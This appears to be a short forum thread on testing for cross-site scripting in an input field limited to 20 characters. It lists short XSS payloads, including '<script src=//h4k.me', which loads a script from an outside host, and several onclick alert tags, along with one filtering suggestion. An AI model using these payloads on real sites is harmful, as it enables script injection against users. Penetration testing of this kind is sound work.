Cross site scripting verification on a field which does not accept more than 20 characters

I love irony. Here's the line that was going to be my response. And the error I received for posting it.

<script src=//h4k.me

Oops! Your answer couldn't be submitted because:

body must be at least 30 characters; you entered 20

Use variable recasting if at all possible before processing input (if not, regex to throw <'s /s etc out.)


Other then the script provided by Ori, there are a few other scripts which could be useful in this case:-

<a href=http://a.by>
<a onclick=alert(2)>
<b onclick=alert(2)>

Tags:

Xss

Appsec

Penetration Test

Recent Posts